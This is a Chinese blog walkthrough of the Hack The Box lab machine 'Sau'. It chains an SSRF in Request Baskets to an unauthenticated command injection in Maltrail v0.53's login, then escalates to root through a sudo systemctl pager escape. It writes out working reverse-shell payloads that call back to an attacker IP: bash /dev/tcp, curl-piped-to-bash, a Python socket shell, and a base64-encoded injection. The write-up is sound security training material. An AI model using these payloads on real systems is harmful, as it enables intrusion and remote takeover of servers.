HTB-Sau

最新推荐文章于 2024-11-01 16:03:12 发布
最新推荐文章于 2024-11-01 16:03:12 发布
阅读量361 收藏 9
点赞数 11
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73373164/article/details/136590782
版权

title: HTB-Sau
date: 2023-12-14 08:50:56
categories: HTB
tag: 渗透

Sau

信息收集

获得靶机ip

使用nmap扫描同时使用浏览器访问查看一下

发现访问后没有出现内容

nmap扫描结束内容如下

Starting Nmap 7.93 ( https://nmap.org ) at 2023-12-14 08:52 中国标准时间
Stats: 0:01:24 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 72.40% done; ETC: 08:54 (0:00:32 remaining)
Nmap scan report for bogon (10.10.11.224)
Host is up (0.35s latency).
Not shown: 997 closed tcp ports (reset)
PORT      STATE    SERVICE
22/tcp    open     ssh
80/tcp    filtered http
55555/tcp open     unknown

Nmap done: 1 IP address (1 host up) scanned in 112.22 seconds

这里的80端口显示被过滤了那我们使用nmap -sF来进行扫描这个端口看看

tips: FIN 为 TCP会话结束标志,在FIN扫描中一个设置了FIN位的数据包被发送后,若响应RST数据包,则表示端口关闭,没有响应则表示开放。此类扫描同样不能准确判断windows系统上端口开发情况,适合探测Linux系统上的端口开放情况

Host is up (0.39s latency).

PORT   STATE         SERVICE
80/tcp open|filtered http

Nmap done: 1 IP address (1 host up) scanned in 5.34 second

发现是打开的没问题

然后访问开启的55555端口发现可以

http://10.10.11.224:55555/

使用详细扫描扫描到了

PORT      STATE    SERVICE VERSION
22/tcp    open     ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
80/tcp    filtered http
55555/tcp open     unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port55555-TCP:V=7.93%I=7%D=12/14%Time=657A52FF%P=i686-pc-windows-window
SF:s%r(GetRequest,A2,"HTTP/1\.0\x20302\x20Found\r\nContent-Type:\x20text/h
SF:tml;\x20charset=utf-8\r\nLocation:\x20/web\r\nDate:\x20Thu,\x2014\x20De
SF:c\x202023\x2000:57:37\x20GMT\r\nContent-Length:\x2027\r\n\r\n<a\x20href
SF:=\"/web\">Found</a>\.\n\n")%r(GenericLines,67,"HTTP/1\.1\x20400\x20Bad\
SF:x20Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnecti
SF:on:\x20close\r\n\r\n400\x20Bad\x20Request")%r(HTTPOptions,60,"HTTP/1\.0
SF:\x20200\x20OK\r\nAllow:\x20GET,\x20OPTIONS\r\nDate:\x20Thu,\x2014\x20De
SF:c\x202023\x2000:57:40\x20GMT\r\nContent-Length:\x200\r\n\r\n")%r(RTSPRe
SF:quest,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/p
SF:lain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Req
SF:uest")%r(Help,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x
SF:20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Ba
SF:d\x20Request")%r(SSLSessionReq,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r
SF:\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close
SF:\r\n\r\n400\x20Bad\x20Request")%r(TerminalServerCookie,67,"HTTP/1\.1\x2
SF:0400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8
SF:\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request")%r(TLSSessionReq
SF:,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;
SF:\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request"
SF:)%r(Kerberos,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x2
SF:0text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad
SF:\x20Request")%r(FourOhFourRequest,EA,"HTTP/1\.0\x20400\x20Bad\x20Reques
SF:t\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nX-Content-Type-Op
SF:tions:\x20nosniff\r\nDate:\x20Thu,\x2014\x20Dec\x202023\x2000:58:14\x20
SF:GMT\r\nContent-Length:\x2075\r\n\r\ninvalid\x20basket\x20name;\x20the\x
SF:20name\x20does\x20not\x20match\x20pattern:\x20\^\[\\w\\d\\-_\\\.\]{1,25
SF:0}\$\n")%r(LPDString,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-
SF:Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n40
SF:0\x20Bad\x20Request")%r(LDAPSearchReq,67,"HTTP/1\.1\x20400\x20Bad\x20Re
SF:quest\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x
SF:20close\r\n\r\n400\x20Bad\x20Request");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

访问55555端口发现提示貌似代理访问的东西,那很直接了ssrf直接设置访问127.0.0.1:80端口

POST /api/baskets/add HTTP/1.1
Host: 10.10.11.224:55555
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 142

{
  "forward_url": "http://127.0.0.1:80/",
  "proxy_response": true,
  "insecure_tls": false,
  "expand_path": true,
  "capacity": 250
}

这样的话访问路由add就相当于访问http://127.0.0.1:80,接下来访问add端口后对其进行目录扫描

wfuzz -w "D:\wordlist\directoryDicts\Filenames_or_Directories_All.txt" --hc 404,502 http://10.10.11.224:55555/add/FUZZ

扫描了一些发现已经扫描到了

000000132:   200        2 L      4 W        26 Ch       "robots.txt"
000000240:   200        73 L     276 W      15051 Ch    "favicon.ico"
000000311:   200        111 L    432 W      7091 Ch     "index"
000000252:   401        0 L      2 W        12 Ch       "login"
000001986:   401        0 L      0 W        0 Ch        "events"
000005704:   200        0 L      1 W        4 Ch        "ping"

接下来一个一个查看路由,index下提示了这个使用的什么服务

Powered by Maltrail (v0.53)
Hide threat
Report false positive

去网上找找这个服务的漏洞

maltrail是开源的恶意流量检测系统,项目地址:https://github.com/stamparm/maltrail。

查到了这个项目的漏洞了

描述
Maltrail <= v0.54 在登录过程中容易受到未经身份验证的操作系统命令注入的影响。

总结
mailtrail/core/http.py 中的函数在参数中包含命令注入漏洞。subprocess.check_outputparams.get("username")

攻击者可以通过将任意操作系统命令注入 username 参数来利用此漏洞。注入的命令将以正在运行的进程的权限执行。此漏洞无需身份验证即可远程利用。

概念验证
curl 'http://hostname:8338/login' \
  --data 'username=;`id > /tmp/bbq`'
冲击
任意命令执行

也就是说在login页面发送username=;``就能任意命令执行

虽然能够执行命令但是无法直接回显出内容很操作

反弹shell

直接反弹shell

bash -i >& /dev/tcp/10.10.14.54/9999 0>&1

使用urlencode

%62%61%73%68%24%7b%49%46%53%7d%2d%69%24%7b%49%46%53%7d%3e%26%24%7b%49%46%53%7d%2f%64%65%76%2f%74%63%70%2f%31%30%2e%31%30%2e%31%34%2e%35%34%2f%39%39%39%39%24%7b%49%46%53%7d%30%3e%26%31

发现反弹不上去

使用获取反弹试试

本地写一个shell.sh然后在使用python -m http.server
相当于本地开启了8000端口
`curl 10.10.14.54:8000/shell.sh|bash`

不晓得为什么不行

那直接使用其他的

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((
"10.10.14.54",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'


curl 'http://10.10.11.224:55555/add/login' --data 'username=;`echo "cHl0aG9uMyAtYyAnaW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pO3MuY29ubmVjdCgoCiIxMC4xMC4xNC41NCIsOTk5OSkpO29zLmR1cDIocy5maWxlbm8oKSwwKTsgb3MuZHVwMihzLmZpbGVubygpLDEpO29zLmR1cDIocy5maWxlbm8oKSwyKTtpbXBvcnQgcHR5OyBwdHkuc3Bhd24oIi9iaW4vYmFzaCIpJw=="|base64 -d|sh`'

反弹成功

listening on [any] 9999 ...
connect to [10.10.14.54] from (UNKNOWN) [10.10.11.224] 37542
puma@sau:/opt/maltrail$ ls

在puma的目录下就有一个flag

提取

使用sudo -l

Matching Defaults entries for puma on sau:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User puma may run the following commands on sau:
    (ALL : ALL) NOPASSWD: /usr/bin/systemctl status trail.service

提示能执行systemctl

那好办了

参考链接

https://gtfobins.github.io/gtfobins/systemctl/

直接照搬exp的话可能需要你输入puma的密码这个时候就只有使用

sudo /usr/bin/systemctl status trail.service
!sh

因为上面现在不需要密码的只有

(ALL : ALL) NOPASSWD: /usr/bin/systemctl status trail.service

然后在root目录下得到flag2

c0iq
关注
HTB- Sau
TA不懒,但还没有添加简介
08-03 825
就几个参数,排除forward_url,就剩下其他四个,一个一个改改试试吧。把proxy_response改为true出现了新的信息,这个proxy_response应该是会返回请求的内容吧。sudo -l一看,又是这个老伙计了/usr/bin/systemctl。用排除法判断是payload有问题。在最上面还有几个功能没有尝试过。访问55555端口,得到Request Baskets。在Settings上抓包并且发现了特别眼熟的场景。内容有点多,输出到文件看看。,记得要在登录界面使用。
HTB-SAU
weixin_44770698的博客
01-13 540
HTB-靶场练习
HTB-sau Walkthrough
weixin_41958290的博客
12-11 440
Request-basket存在SSRF,可以访问服务器本地的80端口Maltrail自身存在漏洞。
HTB靶场-Sau
yc11223344的博客
01-05 1014
使用Request Baskets 的SSRF漏洞进行访问80端口的页面Maltrail v0.53的RCE漏洞进行反弹shell使用systemctl进行提权由于靶场的网络不稳定所以有时候需要重新操作好几遍才能成功。
HTB - PC
whale_waves的博客
10-06 107
运行的时候需要tls手令,网上搜了下加上-paintext就行。第一个flag就在这个文件夹里。
HTB PC
qq_64201116的博客
05-30 1663
链接:https://qing3feng.github.io/2023/05/29/HTB%20PC/今天又学一招,配置好/etc/hosts​文件:​[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-YHXRNj1I-1685406194714)(https://qing3feng.github.io/Blogimages/HTB_PC/image-20230529093245-pwj2tjw.png)]​如图所示,这样子就可以直接ping pc​了,不用再​。
HTB Sau Maltraill-v0.53 CVE-2021-3560
q
12-27 499
编译报错Package ‘dbus-1’, required by ‘virtual:world’, not found使用apt安装libdbus-1-dev解决。sh就提权成功了,为什么会用trail服务因为sudo-l只有这个服务才能不用输入密码。手撮失败,sys返回的值为0.002s,改成0.001和改成0.002都创建不了pwn用户,试了无数次,换个方向。maltrail配置文件在/opt/maltrail/maltrail.conf下发现一串hash。搜索sudo systemctl提权。
HackTheBox系列-Sau
qq_43264813的博客
12-18 637
1、使用nmap进行端口扫描2、发现除了22端口ssh外,唯一开放的端口55555上跑着Http服务,使用浏览器进行访问发现是一个request-baskets | Version: 1.2.1 的服务3、使用google进行搜索关于该版本的漏洞信息,发现其存在一个CVE-2023-27163的SSRF漏洞。
HTBSau[WriteUP]
如有错误感谢斧正
10-18 1029
发现systemd 246包含漏洞升级,此时可以以root用户身份运行“systemctl status”命令。#漏洞利用标题:systemd 246 - Local Exploit Escalation。对靶机端口:22、80、8338、55555进行脚本、服务信息扫描。直接sudo执行sudo -l中回显的可sudo执行的文件。直接进行漏洞利用,尝试通过该SSRF漏洞访问靶机80端口。1.运行可以以根用户身份运行的systemctl命令。可知,该漏洞影响该软件1.2.1及之前的版本。
qos-htb-开源
05-03
qos-htb是您一直在等待的简单带宽管理解决方案,graphix制作了图表,您可以在一秒钟之内查看到底谁在消耗带宽!
xml-HTB-开源
05-02
xml-HTB是用于自动生成bash脚本的工具,该工具可在Linux上设置HTB。 它使用xml配置文件。 它易于使用,具有许多功能:多种深度的类,可配置的叶子,u32和fw过滤器,可同时配置两个输入
HTB-Recon:Hackthebox计算机的自动侦查脚本(hackthebox.eu)
03-09
例如: ./htb-recon.sh 10.10.10.10. ServMon Windows ./htb-recon.sh 10.10.10.10. ServMon Windows 然后通过tmux a -t htb_recon附加会话 它能做什么 在您的主目录中创建一个工作区。 创建不同的文件夹以使事情...
HTB-Gen:脚本para gerar邀请de HackTheBox
03-29
HTB-Gen 脚本para gerar邀请de HackTheBox Windows / Linux Qualquer pessoa pode usar o script para fins lucrativos,para usar apenas tens abrir o teu Terminal / CMD dentro do diretorio do script depois...
htb-beep
m0_55772907的博客
09-15 987
一般
基于 SM3 的密钥派生函数 (KDF):国密合规的安全密钥生成方案
A_Lonely_Smile的博客
10-29 787
在现代加密技术中,密钥派生函数(Key Derivation Function, KDF)是一个将初始输入(如密码、共享密钥等)转换为安全密钥的过程,用于实现加密、消息认证等密码操作。特别是在符合国密标准的场景中,基于 SM3 的 KDF 已成为一种常用的密钥生成方式。本文将详细讲解 SM3-KDF 的工作原理,逐步介绍其实现过程,并提供 Java 代码示例,帮助您理解如何在项目中应用 SM3-KDF。
服务攻防之开发组件安全
qq_63831588的博客
10-28 1234
log4j 是 Apache 的一个开源日志库,是一个基于 Java 的日志记录框架,Log4j2 是 log4j 的后继者,其中引入了大量丰富的特性,可以控制日志信息输送的目的地为控制台、文件、GUI 组建等,被应用于业务系统开发,用于记录程序输入输出日志信息,log4j2 中存在JNDI注入漏洞,当程序记录用户输入的数据时,即可触发该漏洞,成功利用该漏洞可在目标服务器上执行任意代码。
冷钱包与热钱包的差异 | 加密货币存储的安全方案
最新发布
tusik68的博客
11-01 719
想要安全存储加密货币?了解冷钱包和热钱包的核心差异,找到适合的存储方式,确保您的数字资产安全无忧。
软件系统安全保证措施,质量保证措施方案(Word原件套用)
2302_79423711的博客
10-29 389
系统安全保证措施是构建稳固防御体系的核心,旨在全方位保障信息系统的安全性。以下是对这七项措施的简要概述: 一、身份鉴别:采用多种认证方式,如密码、生物识别等,确保用户身份的准确无误,防止非法入侵。 二、访问控制:依据用户角色和权限,实施严格的访问策略,限制对敏感数据和功能的访问,保障系统安全。 三、通信完整性、保密性:通过加密技术和安全协议,确保数据传输过程中的完整性和保密性,防止信息泄露或被篡改。
漫途焊机安全生产监管方案,提升安全生产管理水平!
mantoo2014的博客
11-01 189
随着智能制造时代的到来,企业安全生产管理的重要性日益凸显。因此,利用物联网技术和设备监控技术加强焊机安全生产监管,成为企业提升安全生产管理效率、降低安全事故率的重要手段。漫途焊机安全生产监管方案,凭借其物联网技术和设备监控技术。
ROS双线HTB流控配置手册:保障游戏体验
"ROS双线HTB操作手册" ROS双线HTB(Hierarchical Token Bucket,层次化令牌桶)是一种高级的流量整形技术,用于在RouterOS操作系统中实现精细化的网络带宽管理。此手册主要针对如何在双线环境中,如电信和联通线路...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值